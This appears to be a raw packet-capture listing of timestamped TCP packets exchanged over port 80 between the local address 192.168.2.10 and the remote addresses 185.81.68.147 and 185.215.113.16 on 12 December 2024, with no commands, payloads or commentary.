                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.615710974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.615835905 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.616616964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.616632938 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.616738081 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.617358923 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.617480993 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.617523909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.617535114 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.617623091 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.617749929 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.618470907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.618618011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.618865013 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.619435072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.619507074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.619563103 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.619609118 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.619625092 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.619643927 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.619879007 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.620398045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.620487928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.620579958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.621227980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.621321917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.621552944 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.621630907 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.621650934 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.621654034 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.621932030 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.622011900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.622136116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.622318029 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.622565985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.622637987 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.622759104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.623317957 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.623450994 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.623450994 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.623456955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.623553038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.623600006 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.623673916 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.624485970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.624641895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.625394106 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.625401974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.625624895 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.625791073 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.626034975 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.628087044 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.628380060 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.628427982 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.628427982 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.630462885 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.630507946 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.630634069 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.630673885 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.632874012 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.632927895 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.632940054 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.632972956 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.635235071 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.635371923 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.635441065 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.635441065 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.637561083 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.637675047 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.637810946 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.637923956 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.639986992 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.640065908 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.640070915 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.640212059 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.642235994 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.642585039 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.643091917 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.643151999 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.644654989 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.644701004 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.645000935 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.645076990 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.665966034 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.714220047 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.714323044 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.714708090 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.714822054 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.715142012 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.715356112 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.715538025 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.715697050 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.717102051 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.717184067 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.717814922 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.717878103 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.718029022 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.718072891 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.719516039 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.719566107 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.719569921 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.719644070 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.721368074 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.721483946 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.721489906 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.721632957 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.723145962 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.723220110 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.723754883 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.723824978 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.724951029 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.724956989 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.725217104 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.726628065 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.726716995 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.726828098 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.727118969 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.728537083 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.728679895 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.728701115 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.728768110 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.730180979 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.730261087 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.730324984 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.730370045 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.731856108 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.731916904 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.731972933 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.731972933 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.733484030 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.733624935 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.733942986 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.734097004 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.735131025 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.735213995 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.735388041 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.735471010 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.736824036 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.737247944 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.737304926 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.737782001 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.738411903 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.738579988 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.738837957 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.740010977 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.740082979 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.740092039 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.740164042 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.741624117 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.741687059 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.741713047 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.741754055 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.743277073 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.743374109 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.743797064 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.743880987 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.744770050 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.744847059 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.745063066 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.745141029 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.746442080 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.746448040 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.746758938 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.747926950 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.747971058 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.748262882 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.748400927 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.749449015 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.749649048 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.749835968 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.749877930 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.750968933 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.751209021 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.751914978 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.752017021 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.752548933 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.752556086 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.752626896 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.754034042 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.754105091 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.754266977 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.754393101 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.755521059 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.755620003 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.755677938 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.755739927 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.756951094 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.757038116 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.757138014 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.757211924 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.758395910 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.758733034 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.759583950 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.759646893 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.759887934 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.760004044 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.760936975 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.761388063 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.761394978 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.761524916 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.762805939 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.762820959 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.762953043 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.764229059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.764280081 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.764285088 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.764381886 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.764385939 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.764398098 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.764432907 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.764714003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.764802933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.765139103 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.765552998 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.765608072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.765706062 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.765739918 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.765746117 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.765911102 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.766555071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.766807079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.766900063 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.767075062 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.767220974 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.767282009 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.767338037 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.767527103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.767971992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.768054008 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.768531084 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.768578053 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.768579006 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.768590927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.768611908 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.768697023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.768785954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.769603014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.769942045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.769952059 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.769963980 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.770029068 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.770050049 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.770606995 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.771370888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.771383047 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.771426916 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.771457911 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.771472931 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.771586895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.771667004 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.771747112 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.772633076 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.772752047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.772766113 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.772778034 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.772838116 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.772850990 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.773770094 CET8049946185.81.68.147192.168.2.10
